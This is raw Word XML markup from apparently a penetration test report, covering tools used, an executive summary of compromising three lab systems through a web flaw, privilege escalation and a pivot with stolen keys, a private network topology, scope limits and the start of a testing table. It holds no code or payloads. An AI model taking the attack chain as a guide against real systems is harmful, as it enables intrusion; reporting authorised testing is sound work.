        <w:t>ffuf</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">, dirsearch, </w:t>
      </w:r>
      <w:r w:rsidR="00100D52" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Metasploit framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">, browser-based testing, </w:t>
      </w:r>
      <w:r w:rsidR="00812034" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Linpease.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B6AC2F" w14:textId="740895B5" w:rsidR="00887806" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00D77DFE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability Categories</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: OWASP Top 10 (XSS, SQLi, Broken Access Control, SSRF, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B52711E" w14:textId="0376C478" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="000C1F7F" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_Toc223521142"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.5 </w:t>
      </w:r>
      <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
    </w:p>
    <w:p w14:paraId="066F3550" w14:textId="13826885" w:rsidR="0007134A" w:rsidRPr="00D77DFE" w:rsidRDefault="0007134A" w:rsidP="0007134A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment evaluated three systems located in separate network segments. On the first system, the tester identified a weakness in a web application that allowed initial unauthorized access. This access was then used to exploit poor permission controls, ultimately enabling the tester to obtain the highest administrative privileges on the system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EB7C8C" w14:textId="77777777" w:rsidR="0007134A" w:rsidRPr="00D77DFE" w:rsidRDefault="0007134A" w:rsidP="001917CF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The second system contained a custom web application offering several online functions. Testing revealed multiple security weaknesses within these features, indicating that the system could be easily misused by an attacker to gain control and extract sensitive information. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072709F8" w14:textId="7F5CC845" w:rsidR="00D77DFE" w:rsidRPr="00123285" w:rsidRDefault="0007134A" w:rsidP="00123285">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The third system was not directly accessible from the internet and initially appeared isolated. However, after compromising one of the internal systems, the tester was able to discover this hidden machine and gain access using stolen authentication keys. This demonstrated that attackers could move internally between systems and compromise assets that were assumed to be protected by network isolation. </w:t>
      </w:r>
      <w:bookmarkStart w:id="164" w:name="_Toc223521143"/>
    </w:p>
    <w:p w14:paraId="0B757467" w14:textId="77777777" w:rsidR="00D77DFE" w:rsidRDefault="00D77DFE" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="505CA6C0" w14:textId="7FB630A7" w:rsidR="00E57551" w:rsidRPr="00D77DFE" w:rsidRDefault="000C1F7F" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.6 </w:t>
      </w:r>
      <w:r w:rsidR="00E57551" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network Topology Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
    </w:p>
    <w:p w14:paraId="0F973952" w14:textId="77777777" w:rsidR="009A2470" w:rsidRPr="00D77DFE" w:rsidRDefault="009A2470" w:rsidP="009A2470">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The environment consists of a routed VPC (10.0.0.0/16) with four subnets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377EAFDE" w14:textId="77777777" w:rsidR="009A2470" w:rsidRPr="00D77DFE" w:rsidRDefault="009A2470" w:rsidP="00585A7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.0.1.0/24:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial external access zone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122DB084" w14:textId="77777777" w:rsidR="009A2470" w:rsidRPr="00D77DFE" w:rsidRDefault="009A2470" w:rsidP="00585A7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.0.2.0/24:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hosts the vulnerable Apache Tomcat web application at 10.0.2.178.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD97BC3" w14:textId="77777777" w:rsidR="009A2470" w:rsidRPr="00D77DFE" w:rsidRDefault="009A2470" w:rsidP="00585A7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.0.3.0/24:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Internal meta server at 10.0.3.190.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1701BF" w14:textId="022EE67B" w:rsidR="00123285" w:rsidRPr="00123285" w:rsidRDefault="009A2470" w:rsidP="00123285">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.0.4.0/24:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Restricted “secret” host at 10.0.4.141, only reachable from 10.0.3.0/24.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3718ACF9" w14:textId="0AA0C756" w:rsidR="00FA5020" w:rsidRPr="00D77DFE" w:rsidRDefault="00E57551" w:rsidP="00E8695D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BDB9C6A" wp14:editId="4A486B69">
            <wp:extent cx="4401879" cy="2890531"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="400648018"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48018" name="Picture 1" descr="A diagram of a computer network&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4416470" cy="2900112"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="183D70D7" w14:textId="4F084CAB" w:rsidR="00D77DFE" w:rsidRPr="005F6208" w:rsidRDefault="005F6208" w:rsidP="005F6208">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_Toc223521144"/>
      <w:r w:rsidRPr="005F6208">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Image 6.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F6208">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1.Network</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F6208">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Topology Over</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>view</w:t>
      </w:r>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB31DD8" w14:textId="41F7072D" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="000C1F7F" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6.7 </w:t>
      </w:r>
      <w:r w:rsidR="006F08D7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scoping and Time Limitations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>
    </w:p>
    <w:p w14:paraId="3B8CC7E7" w14:textId="20726F5B" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00585A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Assessment Window</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: J</w:t>
      </w:r>
      <w:r w:rsidR="00100D52" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>an,1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>, 202</w:t>
      </w:r>
      <w:r w:rsidR="00100D52" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22036D76" w14:textId="074AE9DC" w:rsidR="00812034" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00585A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Environment Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00812034" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">In the same Virtual Private Cloud (VPC) as the target systems, connected via the shared router, but in a different subnet. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F350D48" w14:textId="42431182" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00585A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Limitations</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>: No source code access, no DoS attacks</w:t>
      </w:r>
      <w:r w:rsidR="00100D52" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C7136A" w14:textId="341F9E54" w:rsidR="00D77DFE" w:rsidRPr="005F6208" w:rsidRDefault="006F08D7" w:rsidP="005F6208">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tester Role</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">: External, unauthenticated </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>black-box</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449D6302" w14:textId="5DD0C79E" w:rsidR="00D77DFE" w:rsidRPr="00D77DFE" w:rsidRDefault="005F6208" w:rsidP="00D77DFE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidR="00D77DFE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.8 Testing Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4469EE9B" w14:textId="77777777" w:rsidR="00D77DFE" w:rsidRPr="00D77DFE" w:rsidRDefault="00D77DFE" w:rsidP="00686E5B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F327BE3" w14:textId="3C09C9EB" w:rsidR="00FA5020" w:rsidRPr="00D77DFE" w:rsidRDefault="000E321B" w:rsidP="00686E5B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6.1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Testing Summary</w:t>
      </w:r>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Calibri" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="905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2879"/>
        <w:gridCol w:w="86"/>
        <w:gridCol w:w="86"/>
        <w:gridCol w:w="3807"/>
        <w:gridCol w:w="1362"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC2338" w:rsidRPr="00D77DFE" w14:paraId="1C4C6630" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A10FD51" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="005870BA">
            <w:pPr>
